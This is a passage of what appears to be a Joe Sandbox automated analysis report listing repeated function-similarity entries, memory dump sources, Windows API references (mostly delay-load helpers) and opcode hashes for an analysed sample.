                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 48be86cdfeb7f6460fb8389e667c8a0f51a5ec4844011db63df6da9f77dee621
                                                              • Instruction ID: 36b5cb5e187e0a49c2971ad1e3a6bdcbe5ee83542f16877862350026e3a2aba3
                                                              • Opcode Fuzzy Hash: 48be86cdfeb7f6460fb8389e667c8a0f51a5ec4844011db63df6da9f77dee621
                                                              • Instruction Fuzzy Hash: 41B012812ED140FC314451A51F02DB7424DC1C0F31331C52BF400C3143E4400C442133
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: d610c258fc1d205da0bc11e4d83187de7e4e2249303a3efa49af83a436d565e0
                                                              • Instruction ID: b7a104b84c3b3c4437b4b0223bb4051ebd6e474905b65ed1be7b369e94027e49
                                                              • Opcode Fuzzy Hash: d610c258fc1d205da0bc11e4d83187de7e4e2249303a3efa49af83a436d565e0
                                                              • Instruction Fuzzy Hash: 4EB012812ED141BC310451952F02EB6424DC1C0F31331852BF010C3543E4400C442033
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 5db02503facd726b1d3a8a5a9fc1ed870035a9fadbe8981e6c1be5b844aecae3
                                                              • Instruction ID: ff42eff5c81a2b1d602c3b0e12e75f8810eeb782e8694d06f92b52cccb4e3582
                                                              • Opcode Fuzzy Hash: 5db02503facd726b1d3a8a5a9fc1ed870035a9fadbe8981e6c1be5b844aecae3
                                                              • Instruction Fuzzy Hash: FDB012812ED180BC310451951F02DB7424DC1C0F31331C52BF100C3143E4400C462033
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4C90
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: e4525d2bc61b73f75644fbe84cc933615b199e9975768100eb7828346838d544
                                                              • Instruction ID: f7d0768839a28b46e0e24ce0319a6038a9debbcdb09adaaf90f101896b11cade
                                                              • Opcode Fuzzy Hash: e4525d2bc61b73f75644fbe84cc933615b199e9975768100eb7828346838d544
                                                              • Instruction Fuzzy Hash: 82B012952ED140BC310411851F02CB6420DC9D0F32331C61BF100D2043A4400C422033
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 7aac0f06b696f6044ab601adc9c3d98758353711dc73d8a8e06e14cd723e578f
                                                              • Instruction ID: c128bc717b040761d80b3e33852a4d89d9c3ddaffb529b0f33e89c4239caa14b
                                                              • Opcode Fuzzy Hash: 7aac0f06b696f6044ab601adc9c3d98758353711dc73d8a8e06e14cd723e578f
                                                              • Instruction Fuzzy Hash: 5EB012852DD2417C310461851F02DB6415DC0C1F30330C52BF400C3143E4401C482232
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 7d86605a38ab0e9c77f7d175366642b82e2b89edc770cc94044270ba51fb8905
                                                              • Instruction ID: 65327d92333daa12f75026cd122bf399fe2a3af79f2b863e0a06d6677ef1d604
                                                              • Opcode Fuzzy Hash: 7d86605a38ab0e9c77f7d175366642b82e2b89edc770cc94044270ba51fb8905
                                                              • Instruction Fuzzy Hash: D0B012852DD3417C324461851F02DB6456DC0C0F30330863BF000C2143E4411C852032
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4CF1
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 32d19db3f8e422684dbfcb7652c0d0810bd9d2542bdf84ea7d46f45ffdc4b2f3
                                                              • Instruction ID: 8c7756b9d394f86e225047032f5dbbfbc1e04519375e16c827d9d17f1cbe60d2
                                                              • Opcode Fuzzy Hash: 32d19db3f8e422684dbfcb7652c0d0810bd9d2542bdf84ea7d46f45ffdc4b2f3
                                                              • Instruction Fuzzy Hash: 55B012852DD2427C310461852F02DB6415DD0C0F30330853FF010C2143E4401C452032
                                                              APIs
                                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 009A2233
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 5ece1b9e54eb964ac728fa85016d8ee027c72d24fb3ea0ebe4f8d94e39c6d0b8
                                                              • Instruction ID: 52f07a56ba34090fa02f5ffae3f6029c3d57a38cd8b1ac9e5c11954151227fc6
                                                              • Opcode Fuzzy Hash: 5ece1b9e54eb964ac728fa85016d8ee027c72d24fb3ea0ebe4f8d94e39c6d0b8
                                                              • Instruction Fuzzy Hash: EEC04C70615201DF8704CF68DA8CE0A77AABF527157518468F454CB020C734DC51DE65
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 2a4cb51c4b8f52ae41bad4585045a3da1674c705b045322b5957546b6ac29c40
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: 2a4cb51c4b8f52ae41bad4585045a3da1674c705b045322b5957546b6ac29c40
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 2bc8ec33117b3336f7b8135de9cf21012a6b7ad899620ca854f04a12629a3554
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: 2bc8ec33117b3336f7b8135de9cf21012a6b7ad899620ca854f04a12629a3554
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 93c6f9defc2b89014d8050ec0b2215c66a8716fa70bf34a51dbe524e61c6cc9d
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: 93c6f9defc2b89014d8050ec0b2215c66a8716fa70bf34a51dbe524e61c6cc9d
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: b34e988c1b96367f25e73d8dcd346ee1fabd88473b60ecc61acaa5fd1fcf80c9
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: b34e988c1b96367f25e73d8dcd346ee1fabd88473b60ecc61acaa5fd1fcf80c9
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 3ce48ef2c226bd28b8b81efbe30c46c4b8c5e209fa95ea3e353f715416d99784
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: 3ce48ef2c226bd28b8b81efbe30c46c4b8c5e209fa95ea3e353f715416d99784
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: a605d92a136cd03d59def37654e23f5405837fadd37ae84e72cb72041e76fd21
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: a605d92a136cd03d59def37654e23f5405837fadd37ae84e72cb72041e76fd21
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4918
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: ec417415dda37bbd5795a5ca72bbb03002d082831293154613bb8114655ece67
                                                              • Instruction ID: d894b900f160bfd0ade0abfef68ed7b168f75a94a7557d686d8ea174b79defaa
                                                              • Opcode Fuzzy Hash: ec417415dda37bbd5795a5ca72bbb03002d082831293154613bb8114655ece67
                                                              • Instruction Fuzzy Hash: 61A001966ED152BC320862A17F07DBB421EC5C5FB53318E1BF512C6583A88559952031
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 9aeda9440e127c6fd35c64c34b7cffaae105f9b8a26870f22f292d214f702a6e
                                                              • Instruction ID: 5c45f529d3fe9d18db6a3928eff752ccdc75c56211b707b09b9e09e070961a82
                                                              • Opcode Fuzzy Hash: 9aeda9440e127c6fd35c64c34b7cffaae105f9b8a26870f22f292d214f702a6e
                                                              • Instruction Fuzzy Hash: 5EA001962ED162BC310862966F07EBB521EC4D5B79331AA1BF612C718BA88458952431
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: 176c598623f513ecbfbe2bb34c4a0728e26aa132cbbaa55a3faf30bb55cc1cd6
                                                              • Instruction ID: dd57fdc5028f6b5b2c03e3a5912ea1a8ea4201d9d0477ace7d98805462b7e0c1
                                                              • Opcode Fuzzy Hash: 176c598623f513ecbfbe2bb34c4a0728e26aa132cbbaa55a3faf30bb55cc1cd6
                                                              • Instruction Fuzzy Hash: 16A001962ED1617C31086296AF07EBB521EC8E1B39331AA1BF611D718BA89459952431
                                                              APIs
                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 009B4B3B
                                                                • Part of subcall function 009B4FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 009B5041
                                                                • Part of subcall function 009B4FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 009B5052
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1505147246.0000000000991000.00000020.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                                                               • Associated: 00000000.00000002.1505121864.0000000000990000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505189878.00000000009CC000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009D9000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505215539.00000000009E2000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.1505253992.00000000009E7000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_990000_uhbrQkYNzx.jbxd
                                                              Similarity
                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                              • String ID:
                                                              • API String ID: 1269201914-0
                                                              • Opcode ID: f5c147c6afb56decb4fd2ee3866f3f43ddd9d0c708fac419759d80e1d4416dde
